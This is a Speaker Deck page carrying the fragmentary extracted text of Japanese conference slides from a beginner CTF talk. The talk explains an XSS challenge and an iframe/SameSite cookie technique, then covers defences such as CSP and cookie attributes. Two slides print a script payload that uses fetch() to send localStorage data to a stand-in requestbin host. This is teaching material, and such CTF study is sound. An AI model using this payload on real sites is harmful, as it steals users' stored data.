$30 off During Our Annual Pro Sale. View Details »
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
Search
Hi120ki
October 17, 2021
Technology
0
990
Magicで学ぶWebセキュリティ - SECCON Beginners Live 2021
SECCON Beginners Live 2021 発表スライド
https://connpass.com/event/225707/
Hi120ki
October 17, 2021
Tweet
Share
More Decks by Hi120ki
See All by Hi120ki
Reversing基礎編 / Basics of Reversing - SECCON Beginners Live 2022
hi120ki
5
2k
CTF大会開催はいいぞ。- 魔女のお茶会 2021冬 / Guide for holding CTF events
hi120ki
2
1.3k
Other Decks in Technology
See All in Technology
コーポレートデータマスター構築への道
kworkdev
PRO
0
130
[GDG DevFest Bangkok 2024] - The Future of Retail E-commerce with Gemini AI
punsiriboo
0
300
EthernetベースのGPUクラスタ導入による学びと展望
lycorptech_jp
PRO
0
580
Engineer Recruting Deck
siva_official
PRO
1
3.3k
MediaPipe と ML Kit ってどう ちがうの? / What is the difference between MediaPipe and ML Kit?
yanzm
0
510
ソフトウェアエンジニアとしてキャリアの螺旋を駆け上がる方法 - 経験と出会いが人生を変える / Career-Anchor-Drive
soudai
13
2.8k
2024/12/05 AITuber本著者によるAIキャラクター入門 - AITuberの基礎からソフトウェア設計、失敗談まで
sr2mg4
2
560
asumikamというカンファレンスオーガナイザの凄さを語る / The Brilliance of Asumikam
tomzoh
1
290
間違いだらけのポストモーテム - ホントに役立つレビューはこうだ!
jacopen
5
990
論理レプリケーションを使ったDB統合
kkato1
0
290
GeminiとUnityで実現するインタラクティブアート
hokkey621
0
620
JAWS-UG 横浜支部 #76 AWS re:Invent 2024 宇宙一早い Recap LT3Amazon EKS Auto Modeと遊び(パーティ)の話
tjotjo
0
100
Featured
See All Featured
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
44
6.9k
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
42
9.3k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
4
410
Building a Modern Day E-commerce SEO Strategy
aleyda
38
7k
Docker and Python
trallard
41
3.1k
A Philosophy of Restraint
colly
203
16k
StorybookのUI Testing Handbookを読んだ
zakiyama
27
5.3k
A Tale of Four Properties
chriscoyier
157
23k
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
356
29k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
17
2.2k
Keith and Marios Guide to Fast Websites
keithpitt
410
22k
Transcript
Magic Web SECCON Beginners Live 2021 hi120ki
@hi120ki CTF Wani Hackase Web Reversing 2 2021 Reversing :
firmware Web : json, magic
Web Magic 3
Magic [Web Hard] : 31solve Web 5 • • 4
5 /
6 /
7 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
8 / URL
9 /
10 crawler/index.js puppeteer Node.js Chrome URL
11 2. FLAG 3. URL crawler/index.js 1.
12 FLAG nginx/html/static/index.js FLAG
13 FLAG JavaScript XSS( )
XSS 14 HTML Web HTML JavaScript Cookie Web
15 https://magic.quals.beginners.seccon.jp/ FLAG FLAG
16 https://magic.quals.beginners.seccon.jp/?????????? FLAG FLAG <script>…</script>
17 FLAG <script>…</script> FLAG https://magic.quals.beginners.seccon.jp/??????????
18 <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script> FLAG XSS URL
XSS 19 magic/views/index.ejs <script> </script>
20 alert(1)
21 FLAG URL <script> fetch("https://requestbin.example.com/?f=" +encodeURI(localStorage.getItem("memo"))); </script>
22 FLAG URL
23 XSS https://magic.quals.beginners.seccon.jp/
24 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ ✕ XSS
25 ... + = ? XSS
26 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ URL <script>…</script> FLAG
27 / URL https://magic.quals.beginners.seccon.jp/magic?token=c4c89cc8-9b78-417b...
28 URL
29 <script>…</script> https://magic.quals.beginners.seccon.jp/ https://magic.quals.beginners.seccon.jp/ <script>…</script> FLAG XSS
30 FLAG 1. FLAG 2. 3.
31
1. XSS 2. 3. 32
1. XSS 2. 3. 33 FLAG
1. XSS 2. 3. 34
1. XSS 2. 3. 35
36 FLAG
XSS • • Byte Bandits CTF 2020 Notes App •
https://github.com/ByteBandits/bbctf-2020 37
Byte Bandits CTF 2020 Notes App 38 https://example.com/login?username= &password= •
FLAG iframe • • API
iframe 39 https://attacker.example.com/ iframe1 iframe2 URL iframe https://example.com/ https://example.com/ URL
iframe
iframe 40 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ iframe 2 iframe
iframe 41 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG <script>...</script> XSS
FLAG
iframe 42 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ FLAG FLAG (top.iframe1.document.body.innerHTML)
<script>...</script>
43 iframe SameSite Cookie None Lax
44 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=None iframe Cookie Cookie (session=nj49gn...)
FLAG
45 https://attacker.example.com/ iframe1 https://example.com/ SameSite Cookie=Lax iframe Cookie Cookie (session=nj49gn...)
FLAG
SameSite Cookie=Lax 46 https://attacker.example.com/ iframe1 iframe2 https://example.com/ https://example.com/ Cookie Cookie
(session=nj49gn...) ✕ FLAG <script>...</script>
47 SameSite Cookie=None iframe CTF
48 Cookie : SameSite, HttpOnly, Secure... Content-Security-Policy X-Frame-Options ... (
XSS Content-Security-Policy )
49 FLAG +
50 Magic https://github.com/SECCON/Beginners_CTF_2021/tree/main/web/magic/files Freepik from Flaticon https://www.flaticon.com/free-icon/hacker_924874 https://www.flaticon.com/free-icon/programmer_560216 https://www.flaticon.com/free-icon/flag_473724 writeup
https://hi120ki.github.io/blog/posts/20210523-3/